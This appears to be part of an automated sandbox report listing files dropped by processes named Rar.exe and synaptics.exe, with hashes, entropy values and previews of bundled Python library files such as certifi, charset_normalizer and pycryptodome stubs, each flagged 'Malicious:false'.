                                                                                                                                                                                                                                  SSDEEP:6:1REYBXyUzrIY3MTDyQdQAY0OXW6ah05gUQdByKj0ah05gv:1REYB3vIY3YyQnrOXAh05VQ6KZh05q
                                                                                                                                                                                                                                  MD5:81C7899ED070F1D26338977374A4B853
                                                                                                                                                                                                                                  SHA1:2627B47DA19BB2F2B8E7D25A5A57473C00C86550
                                                                                                                                                                                                                                  SHA-256:CA7D073C74998CFFB501A2E6E1C99AF62F49272A5FDFB3527769E2A632DFE1A0
                                                                                                                                                                                                                                  SHA-512:CF5299A774C61A0F84D6E1E4233F426CC9D854D809EEF0D6B1158EC0078E75C54C3141E835DC3D0F376B53EFB8DDE462B49B0A5093C63613B332617966F34D0C
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:from typing import Union, Optional....Buffer = Union[bytes, bytearray, memoryview]....def strxor(term1: bytes, term2: bytes, output: Optional[Buffer]=...) -> bytes: .....def strxor_c(term: bytes, c: int, output: Optional[Buffer]=...) -> bytes: .....
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):191
                                                                                                                                                                                                                                  Entropy (8bit):4.787641890602914
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3:UFo+CmMRJ4ZdK0CJOAlFGCJ7DkCAZFBVC5uQLCY3qXVLCVDvRqvljhfxXFqYLULZ:UvZdK0pAlV/kCAZ4sdXcVz8ljZRFqI5y
                                                                                                                                                                                                                                  MD5:CAAC9B613D9F7C76FBB1F59F51BBC300
                                                                                                                                                                                                                                  SHA1:B085C149A8C6051BE179605BA05E49FDC46ACC7D
                                                                                                                                                                                                                                  SHA-256:73CF19A80E8AAA2D38047F8D4600D5239F9311AA76D68EC430079E44963B6FA6
                                                                                                                                                                                                                                  SHA-512:EF4DD006C4B3CFD5C48F94F094C3D3A02FA5A5D8185E13203A7E6715CD64CFA98E9A34764364D08AF0C959A23A700E12AC2E404AD322491CA38E75F0B3FD80CF
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:__all__ = ['Cipher', 'Hash', 'Protocol', 'PublicKey', 'Util', 'Signature',.. 'IO', 'Math']....version_info = (3, 20, '0')....__version__ = ".".join([str(x) for x in version_info])..
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):103
                                                                                                                                                                                                                                  Entropy (8bit):4.320003818965119
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3:1REvgBk8J0fWQLCfcJAOLRL+2MliHovcoFQy:1REYBb0fWpcFY2MtJN
                                                                                                                                                                                                                                  MD5:BF77DB2C18C7E4E3E80EA7D09C2D8336
                                                                                                                                                                                                                                  SHA1:682ADC1869A615EBC5152E303D7F10C9DF4800C1
                                                                                                                                                                                                                                  SHA-256:748D33339311187C619DF8EAA40C8F1A8B4A4EB3E59DE4CDD90FA30105CD8351
                                                                                                                                                                                                                                  SHA-512:ADD512240AB6D99FF0B4871C7F96849267CCB8CD5BE8BAB86579D5599434266F1C4C290DF395526C694110BDD67DCDA6970CEF39416AB87798AC78914AD87EB7
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:from typing import Tuple, Union....version_info : Tuple[int, int, Union[int, str]]..__version__ : str..
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):7563
                                                                                                                                                                                                                                  Entropy (8bit):5.077688752377494
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:CcgPE5vcnnqs8NYd7pqqx0H/8qq/xqqqRuLMJXHge3YbkqZPqqq3KqUCwqEMlkgM:iyvcnnqs+67pqqx0H/8qq/xqqqRuLMXC
                                                                                                                                                                                                                                  MD5:98E5FA7A0689796A8F104E6189C99463
                                                                                                                                                                                                                                  SHA1:6FFB5F1D7F5E60488A4F13AA3361548B4F248D82
                                                                                                                                                                                                                                  SHA-256:2832D8FAD3F3DE4DF41F9335A2AEF55B63452BC39878B1B7D1CFD8308C819016
                                                                                                                                                                                                                                  SHA-512:A10EE1315FFAB419FAA2B9A191E7DD7950E71B8665740D26C866A1F3CDD839FBCC2156BEB1ABFFC9D098910DA4D2093A7E8163821BF57BA0B1053D62125791C6
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o..........f.........................@...s....d.d.l.Z.d.d.l.Z.d.e.j.v.Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.G.d.d...d...Z.G.d.d...d...Z.e.j.D.].Z.e.e.d.e.....e.j.....q2e...Z.d.d...Z.G.d.d...d...Z.d.d...Z.d.d...Z.d.S.)......NZ.__pypy__c....................C...s6...d.t.j.v.r.d.S.t.r.t.j.d.k.r.d.S.d.d.l.}.|...d.....d.S.).N..distutils)...........r....a....Distutils was imported before Setuptools, but importing Setuptools also replaces the `distutils` module in `sys.modules`. This may lead to undesirable behaviors or errors. To avoid these issues, avoid using distutils directly, ensure that setuptools is installed in the traditional way (e.g. not an editable install), and/or make sure that setuptools is always imported before distutils.)...sys..modules..is_pypy..version_info..warnings..warn).r......r.....HC:\Users\Public\M20EKMMEH2\lib\site-packages\_distutils_hack\__init__.py..warn_distutils_present....s....................r....c....................C...sF...d.t.j.v.r.d.S.d.d.l.}.|...d.
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):94
                                                                                                                                                                                                                                  Entropy (8bit):4.540785862491583
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3:1LGzbQbAwLSkTRFo+HGip4TjLvf0n:1LcQbjrRJGA4Tfcn
                                                                                                                                                                                                                                  MD5:D55B9B12960DB04D3C358F429B5E858F
                                                                                                                                                                                                                                  SHA1:33E92FDF397E4E36A738BAEF1C0F23A3AEACF424
                                                                                                                                                                                                                                  SHA-256:A7F19866B8D4C0F0548692E5099A066F49A2281292A83032642E43BC8BAA6C74
                                                                                                                                                                                                                                  SHA-512:BD86630643723CE20C8FACD6AC54740BAD539CE5E6CCCB65CC3F25E1CB56EF6516C9D5B83799EF3BE675B700BED8AD3CDAAAFF64607EDB3D035DF5AE07A71075
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:from .core import contents, where..__all__ = ["contents", "where"].__version__ = "2024.08.30".
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):243
                                                                                                                                                                                                                                  Entropy (8bit):4.451797874382859
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6:JW6yXBbjB2V+WuSZFeewrCy00y+0re6r/hu:JWfQYWuSZWFdQhu
                                                                                                                                                                                                                                  MD5:269E7F0CA2FA570B10E690595E6AEDAB
                                                                                                                                                                                                                                  SHA1:F09C4BA5E7EE37DDEBE914DEF9D97152CB5EB856
                                                                                                                                                                                                                                  SHA-256:C410688FDD394D45812D118034E71FEE88BA7BEDDD30FE1C1281BD3B232CD758
                                                                                                                                                                                                                                  SHA-512:01CA6DF3FB218B374BBA6653F5E72D6D6A9B07BB22215D5D96D2155DF037A9C6ED8D4F0FF8C789231A6C8C2555229700056FF6F740516F42F839E057FFF59F70
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:import argparse..from certifi import contents, where..parser = argparse.ArgumentParser().parser.add_argument("-c", "--contents", action="store_true").args = parser.parse_args()..if args.contents:. print(contents()).else:. print(where()).
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):270
                                                                                                                                                                                                                                  Entropy (8bit):5.065268054699536
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6:y/AJteNbsZvEG/Xg6nCbWjN2o1mf+uaHKdArsq4G:CAjeNQeGVN2o1chq7
                                                                                                                                                                                                                                  MD5:4EA6B4E0739991A177FFF151F17C04B6
                                                                                                                                                                                                                                  SHA1:FDB3D9F4BB0FB4A59C80FA955CFA8D24F3A70FFC
                                                                                                                                                                                                                                  SHA-256:F00BF4D60B6D81FB6C9878E589F97103C89DA5141C3C3C9AA4D2BDFAAD4D7ED2
                                                                                                                                                                                                                                  SHA-512:1F10F2C4877E75D075810DFE26F83909130A67E155D7D301D542610956614185CFE4014CE51BF3F12F536753BD5C4A8FAFBC65CFD583038AF26BA52163AB46C3
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o.......?..f^........................@...s ...d.d.l.m.Z.m.Z...d.d.g.Z.d.Z.d.S.)......)...contents..wherer....r....z.2024.08.30N)...corer....r......__all__..__version__..r....r.....@C:\Users\Public\M20EKMMEH2\lib\site-packages\certifi\__init__.py..<module>....s..........
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2101
                                                                                                                                                                                                                                  Entropy (8bit):4.9448873737927865
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:tNBUoxmgDZLawhAl/g95K3Q8+epPUHq7J8nH:dUC/Rcg955epA1H
                                                                                                                                                                                                                                  MD5:2AA1F61C76D8A2A6285241CE124AFC54
                                                                                                                                                                                                                                  SHA1:6CA51DA0F75E04394E505ACA66F313C9E6D3FEFE
                                                                                                                                                                                                                                  SHA-256:E9441768E243529AC18DD9345DED9D8F232460E36A7E1F89CEB2FD3287EBB156
                                                                                                                                                                                                                                  SHA-512:4898EBC4BCA12848E9841DC7C7A2FF0750E9DF804CA0E6A6AB7D35EE9F58DD93135BFE019B0B4629040C28ED1938640A6CD743D0ED004F5872259A7AF416F7CD
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o.......?..fJ........................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.d...Z.e.j.d.k.r0d.d.l.m.Z.m.Z...d.a.d.a.d.e.f.d.d...Z.d.e.f.d.d...Z.d.S.e.j.d.k.rQd.d.l.m.Z.m.Z...d.a.d.a.d.e.f.d.d...Z.d.e.f.d.d...Z.d.S.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...e.e.j.e.f...Z.e.e.d.f...Z.....d.d.e.d.e.d.e.d.e.d.e.f.d.d...Z.d.e.f.d.d...Z.d.e.f.d.d...Z.d.S.).ze.certifi.py.~~~~~~~~~~..This module returns the installation location of cacert.pem or its contents.......N..returnc....................C...s....t...d.d.d.....d.S.).N)..._CACERT_CTX..__exit__..r....r.....<C:\Users\Public\M20EKMMEH2\lib\site-packages\certifi\core.py..exit_cacert_ctx....s......r....)...........)...as_file..filesc....................C...s4...t.d.u.r.t.t.d.....d.....a.t.t.......a.t...t.....t.S...N..certifi..cacert.pem)..._CACERT_PATHr....r......joinpathr......str..__enter__..atexit..registerr....r....r....r....r......where....s..............r....c....................C...s....t.d.....d...j.d.d...S...Nr....r......ascii....encoding).r....r......rea
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):299427
                                                                                                                                                                                                                                  Entropy (8bit):6.047872935262006
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6144:QW1x/M8fRR1jplkXURrVADwYCuCigT/QRSRqNb7d8iu5Nahx:QWb/TRJLWURrI5RWavdF08/
                                                                                                                                                                                                                                  MD5:50EA156B773E8803F6C1FE712F746CBA
                                                                                                                                                                                                                                  SHA1:2C68212E96605210EDDF740291862BDF59398AEF
                                                                                                                                                                                                                                  SHA-256:94EDEB66E91774FCAE93A05650914E29096259A5C7E871A1F65D461AB5201B47
                                                                                                                                                                                                                                  SHA-512:01ED2E7177A99E6CB3FBEF815321B6FA036AD14A3F93499F2CB5B0DAE5B713FD2E6955AA05F6BDA11D80E9E0275040005E5B7D616959B28EFC62ABB43A3238F0
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:.# Issuer: CN=GlobalSign Root CA O=GlobalSign nv-sa OU=Root CA.# Subject: CN=GlobalSign Root CA O=GlobalSign nv-sa OU=Root CA.# Label: "GlobalSign Root CA".# Serial: 4835703278459707669005204.# MD5 Fingerprint: 3e:45:52:15:09:51:92:e1:b7:5d:37:9f:b1:87:29:8a.# SHA1 Fingerprint: b1:bc:96:8b:d4:f4:9d:62:2a:a8:9a:81:f2:15:01:52:a4:1d:82:9c.# SHA256 Fingerprint: eb:d4:10:40:e4:bb:3e:c7:42:c9:e3:81:d3:1e:f2:a4:1a:48:b6:68:5c:96:e7:ce:f3:c1:df:6c:d4:33:1c:99.-----BEGIN CERTIFICATE-----.MIIDdTCCAl2gAwIBAgILBAAAAAABFUtaw5QwDQYJKoZIhvcNAQEFBQAwVzELMAkG.A1UEBhMCQkUxGTAXBgNVBAoTEEdsb2JhbFNpZ24gbnYtc2ExEDAOBgNVBAsTB1Jv.b3QgQ0ExGzAZBgNVBAMTEkdsb2JhbFNpZ24gUm9vdCBDQTAeFw05ODA5MDExMjAw.MDBaFw0yODAxMjgxMjAwMDBaMFcxCzAJBgNVBAYTAkJFMRkwFwYDVQQKExBHbG9i.YWxTaWduIG52LXNhMRAwDgYDVQQLEwdSb290IENBMRswGQYDVQQDExJHbG9iYWxT.aWduIFJvb3QgQ0EwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDaDuaZ.jc6j40+Kfvvxi4Mla+pIH/EqsLmVEQS98GPR4mdmzxzdzxtIK+6NiY6arymAZavp.xy0Sy6scTHAHoT0KMM0VjU/43dSMUBUc71DuxC73/OlS8pF94G3VNTCOXkNz
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):4426
                                                                                                                                                                                                                                  Entropy (8bit):4.499383603039266
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:+zn9FkdjbY7xDh07FkFDbq7LItY03xWtVwuZprf3:+zPkhGDh0BkpaIu03skun3
                                                                                                                                                                                                                                  MD5:E41003E9791742059C2298D07A1E828B
                                                                                                                                                                                                                                  SHA1:1F4014D3956D5773FAA402212DF114AC63168FFA
                                                                                                                                                                                                                                  SHA-256:A910C31725D52704C1FC49A81A9A5A5D4FD1F6A099BE197E133C4F32E5779D30
                                                                                                                                                                                                                                  SHA-512:BD979394AF16B7B62490ED580883763533121379428E8CE824C766B3AA0CD5FABD095BEBF76561C23BE14080446975B8198FED81F1FD401690D27B9BA06DE6E8
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:""".certifi.py.~~~~~~~~~~..This module returns the installation location of cacert.pem or its contents..""".import sys.import atexit..def exit_cacert_ctx() -> None:. _CACERT_CTX.__exit__(None, None, None) # type: ignore[union-attr]...if sys.version_info >= (3, 11):.. from importlib.resources import as_file, files.. _CACERT_CTX = None. _CACERT_PATH = None.. def where() -> str:. # This is slightly terrible, but we want to delay extracting the file. # in cases where we're inside of a zipimport situation until someone. # actually calls where(), but we don't want to re-extract the file. # on every call of where(), so we'll do it once then store it in a. # global variable.. global _CACERT_CTX. global _CACERT_PATH. if _CACERT_PATH is None:. # This is slightly janky, the importlib.resources API wants you to. # manage the cleanup of this file, so it doesn't actually return a. # path, it retu
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, Unicode text, UTF-8 text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1623
                                                                                                                                                                                                                                  Entropy (8bit):5.323138942576867
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:puqAQwyptdi1RLhwwl1/DfV8Vgja5HlN8aB:puqAQw9q21/DfV8Sa2aB
                                                                                                                                                                                                                                  MD5:A99E49E46791D457E956314E73C8BCD2
                                                                                                                                                                                                                                  SHA1:8EFCCB21F10F9CCAAC0FF8D5A09DC0BBD260535A
                                                                                                                                                                                                                                  SHA-256:9B571412C6FD2B9BFCDF59BD3FF96FD8995410A0FB321C4BEDFC70DE19FBE68E
                                                                                                                                                                                                                                  SHA-512:EDE2F24B335C2D43C9DF86B865A06E932B884EAD68747F79893F6C00D99DB9A97BD1C9B7A529183278BE0CA78E8E3A798A221C35FCF92335F671510CA993412B
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# -*- coding: utf-8 -*-.."""..Charset-Normalizer..~~~~~~~~~~~~~~..The Real First Universal Charset Detector...A library that helps you read text from an unknown charset encoding...Motivated by chardet, This package is trying to resolve the issue by taking a new approach...All IANA character set names for which the Python core library provides codecs are supported.....Basic usage:.. >>> from charset_normalizer import from_bytes.. >>> results = from_bytes('B.... ..... ... ..... .. ............ O............!'.encode('utf_8')).. >>> best_guess = results.best().. >>> str(best_guess).. 'B.... ..... ... ..... .. ............ O............!'....Others methods and usages are available - see the full documentation..at <https://github.com/Ousret/charset_normalizer>...:copyright: (c) 2021 by Ahmed TAHRI..:license: MIT, see LICENSE for more details..."""..import logging....from .api import from_bytes, fro
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):77
                                                                                                                                                                                                                                  Entropy (8bit):4.168966465012458
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3:1LGGMHRYF0AnrjhAjpv/Fhq0AHy:1LCxgNFAjpH7q0
                                                                                                                                                                                                                                  MD5:A7BB1AAA21433C358CD1B40294C6627E
                                                                                                                                                                                                                                  SHA1:8C1F3F49FCABE5D1F2AFD9B607D5F8B1C0CAE96D
                                                                                                                                                                                                                                  SHA-256:9D59CCA37D614CF376632D38E46248BC78F774A0C9CF8740411DDC51276F6327
                                                                                                                                                                                                                                  SHA-512:D7324A84DCC20C30F722E481DC1D84D322A8CE84DD4CF0798F4ABEACA1DBBB6872C626521AF877D19798351B6A1900F1EEAC71FEEB0F83A3E21EE9AA056124D1
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:from .cli import cli_detect....if __name__ == "__main__":.. cli_detect()..
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1566
                                                                                                                                                                                                                                  Entropy (8bit):5.711048250244809
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:A4jbqjQtyat/c2vhCMhju/C/yv+KbheUy:AWbqjQttwZ/C/yvvteUy
                                                                                                                                                                                                                                  MD5:FD57442F5CAE13FD7A6AFB14E83FFC37
                                                                                                                                                                                                                                  SHA1:F56132F3A13233F74A7502C566E8AE4A9CDEF677
                                                                                                                                                                                                                                  SHA-256:3DA724D1D76947D0709E5AE327E4E7FE5DC217211375EF8949CBEF3EF3C0F090
                                                                                                                                                                                                                                  SHA-512:F1208FD9C9478BFBFE3DF0634C08AB76A86A145E0C57D19B6D55BB698C9458B60CED4629911F4FD1D38ADE5221F8A1943A4C332FA5678E564D1796C024435423
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o.......>..fW........................@...sx...d.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.Z.e...d.....e.........d.S.).u.....Charset-Normalizer.~~~~~~~~~~~~~~.The Real First Universal Charset Detector..A library that helps you read text from an unknown charset encoding..Motivated by chardet, This package is trying to resolve the issue by taking a new approach..All IANA character set names for which the Python core library provides codecs are supported...Basic usage:. >>> from charset_normalizer import from_bytes. >>> results = from_bytes('B.... ..... ... ..... .. ............ O............!'.encode('utf_8')). >>> best_guess = results.best(). >>> str(best_guess). 'B.... ..... ... ..... .. ............ O............!'..Others methods and usages are available - see the full documentation.at <https://github.com/Ousret/charset_normalizer>..:copyright
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):11383
                                                                                                                                                                                                                                  Entropy (8bit):5.821921419246986
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:OWeJLd8V6fySfPAraft774k4M1Cz9ZZERVOBJnCTrFkYAr64BpmA+ifAgQSK5FQm:OWeJLdcS7ft77cZZaKnCvNm64mA+ifA9
                                                                                                                                                                                                                                  MD5:66A91A2CE100061DC8BD3FE007041E2A
                                                                                                                                                                                                                                  SHA1:C49666C2D781CE2C91A1C8729471E4E79BC8EA03
                                                                                                                                                                                                                                  SHA-256:7AB3E836A2B5A7B68A8618749D71D0E2F235C97613A136966B0FA953D9F8D830
                                                                                                                                                                                                                                  SHA-512:B2966B1E0E28D004D1722CAC4BAFE506B3E6F16EACCAD7CAFE4B656425D86AF47A757C8BAD7C322F3E7BDEB0F1B10A4E658BC5473F33FC89387A836A53799D01
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o.......>..f.T.......................@...sL...d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...e.. d...Z!e.."..Z#e#.$e..%d.........................d(d.e.e&e'f...d.e(d.e(d.e)d.e.e.e*....d.e.e.e*....d.e+d.e+d.e)d.e+d.e.f.d.d...Z,..................d(d.e.d.e(d.e(d.e)d.e.e.e*....d.e.e.e*....d.e+d.e+d.e)d.e+d.e.f.d d!..Z-..................d(d"e.e*e&e.f...d.e(d.e(d.e)d.e.e.e*....d.e.e.e*....d.e+d.e+d.e)d.e+d.e.f.d#d$..Z...................d)d%e.e.e*e.e&f...d.e(d.e(d.e)d.e.e.e*....d.e.e.e*....d.e+d.e+d.e)d.e+d.e+f.d&d'..Z/d.S.)*.....N)...PathLike)...BinaryIO..List..Optional..Set..Union.....)...coherence_ratio..encoding_languages..mb_encoding_languages..merge_coherence_ratios)...IANA_SUPPORTED..TOO_BIG_SEQUENCE..TOO_SMALL_SEQUENCE..TRACE)...mess_ratio)...CharsetMatch..CharsetMatches)...any_specified_encoding..cut_sequence_chunks..iana_name..identify_sig_or_bom..is_cp_similar..is_multi_b
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):9644
                                                                                                                                                                                                                                  Entropy (8bit):5.516539400039446
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:6q5CeApoIRl8if8gZ+hjj2mspqjrOBTLpPc7nSgGKO56ytTatX79w/kfTYY:V5uTf8g5mymOBT9Pc7nLGKO56yQt7e/G
                                                                                                                                                                                                                                  MD5:464CD6A50796BC9E8F9FB745026A7FDA
                                                                                                                                                                                                                                  SHA1:3B86678997FE02DAA79F32F52E6EBAEB4628C4D2
                                                                                                                                                                                                                                  SHA-256:7CC39F5E12D2183A0B13FA0F905991EC33708BAB80FD034E00B4DDA00945A417
                                                                                                                                                                                                                                  SHA-512:59D636465D101046D3BFEEC686440D523A2F9E102532B881443AA24AAD62306AC2B86E345EC9A69B6F8107FC6E72F3A39477A79BEE0684D2DB380AAFA23B3F34
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o.......>..f.2.......................@...s....d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.e.d.e.e...f.d.d...Z.d.e.d.e.e...f.d.d...Z.e...d.e.d.e.e...f.d.d.....Z e...d.e.d.e.e...f.d.d.....Z!e.e.d...d.e.d.e.e"e"f...f.d.d.....Z#..d0d.e.e...d.e"d.e.e...f.d.d...Z$d.e.d.e.e...d.e%f.d d!..Z&d"e.d.e.e...f.d#d$..Z'd%e.e...d.e.f.d&d'..Z(d%e.d.e.f.d(d)..Z)e.d*d.....d1d"e.d,e%d-e.e...d.e.f.d.d/....Z*d.S.)2.....N)...IncrementalDecoder)...Counter)...lru_cache).r......Dict..List..Optional..Tuple.....)...FREQUENCIES..KO_NAMES..LANGUAGE_SUPPORTED_COUNT..TOO_SMALL_SEQUENCE..ZH_NAMES).. is_suspiciously_successive_range)...CoherenceMatches)...is_accentuated..is_latin..is_multi_byte_encoding..is_unicode_range_secondary..unicode_range..iana_name..returnc........................s....t.|...r.t.d.....t...d...|.....j.}.|.d.d...}.i...d...t.d.d...D.]/}.|...t.|.g.....}.|.rNt.|...}.|.d.u.r4q.t.|...d.u.rN|...
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):30432
                                                                                                                                                                                                                                  Entropy (8bit):5.8813773858453775
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:qvZKN0taqbKcwF7wuCDXzRibpp2dmnFu3GJusAVlufzR7c:qvZ6EKcR7TlIP8g8luft7c
                                                                                                                                                                                                                                  MD5:8AF82143179A00093512D6F62D18B92D
                                                                                                                                                                                                                                  SHA1:407C67B10963A7B908AE068B1423D30654B884AA
                                                                                                                                                                                                                                  SHA-256:34AB87369922684ACD28976D9D41BC2ECFF88C3BD1C8BC3149DB92AEC94D1745
                                                                                                                                                                                                                                  SHA-512:236FE4833DED1ED8E8E153F58BA15A8D6B137A89AC74934B6DED517A001649030E9D319C8A4A756076F1E1D530AB4E5256D4BBC90F89CA395B0F87B48C2BCE69
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o.......>..f........................@...s~...U.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...e.g.d...d.e.e.g.e.e.g.d...Z.e.e.e.e.e.e...f...f...e.d.<.d.Z.e.e.d.<.e.d...Z.e.e.d.<.d.Z.e.e.d.<.i.d.e.d.....d.e.d.d.....d.e.d.d.....d.e.d.d.....d.e.d.d.....d.e.d.d.....d.e.d.d.....d.e.d.d.....d.e.d.d.....d e.d.d!....d"e.d!d#....d$e.d#d%....d&e.d%d'....d(e.d'd)....d*e.d)d+....d,e.d+d-....d.e.d-d/....i.d0e.d/d1....d2e.d1d3....d4e.d3d5....d6e.d5d7....d8e.d7d9....d:e.d9d;....d<e.d;d=....d>e.d=d?....d@e.d?dA....dBe.dAdC....dDe.dCdE....dFe.dEdG....dHe.dGdI....dJe.dIdK....dLe.dKdM....dNe.dMdO....dPe.dOdQ......i.dRe.dQdS....dTe.dSdU....dVe.dUdW....dXe.dWdY....dZe.dYd[....d\e.d[d]....d^e.d]d_....d`e.d_da....dbe.dadc....dde.dcde....dfe.dedg....dhe.dgdi....dje.didk....dle.dkdm....dne.dmdo....dpe.dodq....dre.dqds......i.dte.dsdu....dve.dudw....dxe.dwdy....dze.dyd{....d|e.d{d}....d~e.d}d.....d.e.d.d.....d.e.d.d.....d.e.d.d.....d.e.d.d.....d.e.d.d.....d.e.d.d.....d.e.d.d...
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):30432
                                                                                                                                                                                                                                  Entropy (8bit):5.8813773858453775
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:qvZKN0taqbKcwF7wuCDDFebpp2dmnFu3GJusAVlufzR7c:qvZ6EKcR7NcP8g8luft7c
                                                                                                                                                                                                                                  MD5:3BA8115C5E6360531C78ED5A4E1622AE
                                                                                                                                                                                                                                  SHA1:8FC95B3E3A2DD21262E89EA8D91C1AB0D4D09763
